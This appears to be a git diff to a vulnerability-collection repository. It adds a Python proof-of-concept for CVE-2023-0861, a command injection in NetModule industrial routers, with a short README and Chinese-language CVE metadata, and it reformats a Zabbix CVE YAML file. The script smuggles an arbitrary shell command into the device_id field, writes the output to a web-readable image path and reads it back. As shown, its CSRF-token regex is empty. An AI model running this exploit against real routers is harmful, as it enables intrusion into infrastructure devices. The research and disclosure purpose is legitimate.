diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py new file mode 100644 index 0000000000000000000000000000000000000000..28a9172be49e0e579c746c455e91f12301c76a13 --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py @@ -0,0 +1,31 @@ +import re +import requests +import argparse +import urllib.parse + + +parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC') +parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router') +parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication') +parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload') +args = parser.parse_args() + +url = f'{args.url}/admin/gnss.php' +c = {'PHPSESSID':args.phpsessid} +response = requests.get(url,cookies=c) +csrf_token = re.search(r'', response.text).group(1) +#print(csrf_token) +data = { +'toggleAlignment': 'test', +'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2', +'csrf-token': csrf_token, +} +#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2') +url = f'{args.url}/admin/gnssAutoAlign.php' + +response = requests.post(url, data=data,cookies=c) + +if response.status_code == 200: + results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c) + #print('done!') + print(results.content.decode()) \ No newline at end of file diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md new file mode 100644 index 0000000000000000000000000000000000000000..9024e8db99830f29f168a4ead25b64c72f6ab55b --- /dev/null +++ b/cve/NetModule/2023/CVE-2023-0861/README.md @@ -0,0 +1,9 @@ +### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers + +NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical +infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security +advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web +management interface and allow authenticated users to execute arbitrary commands with elevated privileges. +As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of +reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the +disclosed vulnerability. diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7495f7ac072423273729457ece85d9338b822d55 --- /dev/null +++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml @@ -0,0 +1,20 @@ +id: CVE-2023-0861 +source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC +info: + name: ONetModule NSRW是NetModule公司的一系列路由器软件。 + severity: HIGH + description: | + NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。 + scope-of-influence: + NSWR 4.3.0.0-4.3.0.119,4.4.0.0-4.4.0.118,4.6.0.0-4.6.0.105,4.7.0.0-4.7.0.103 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0861 + - https://avd.aliyun.com/detail?id=AVD-2023-0861 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0861 + cwe-id: CWE-78, CWE-77 + cnvd-id: None + kve-id: None + tags: cve2023 \ No newline at end of file diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c4dfe862200d680cff85dda2a1537ef4e..e3f384c6c24d7dba5f7d0ef6e46f8b0a2f653a79 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None +id: CVE-2022-23131 +source: + https://github.com/L0ading-x/cve-2022-23131 +info: + name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 + severity: critical + description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 + scope-of-influence: + Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://www.secpulse.com/archives/179601.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + cnvd-id: None + kve-id: None tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 9b6a0f883e6ec8f7d5fee2831d768801e8c67f83..703877e13d5b33f31a095feef43137d872f4fb71 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -174,6 +174,8 @@ cve: Froxlor: - CVE-2021-42325 - CVE-2023-0315 + NetModule: + - CVE-2023-0861 cnvd: apache-tomcat: - CNVD-2020-10487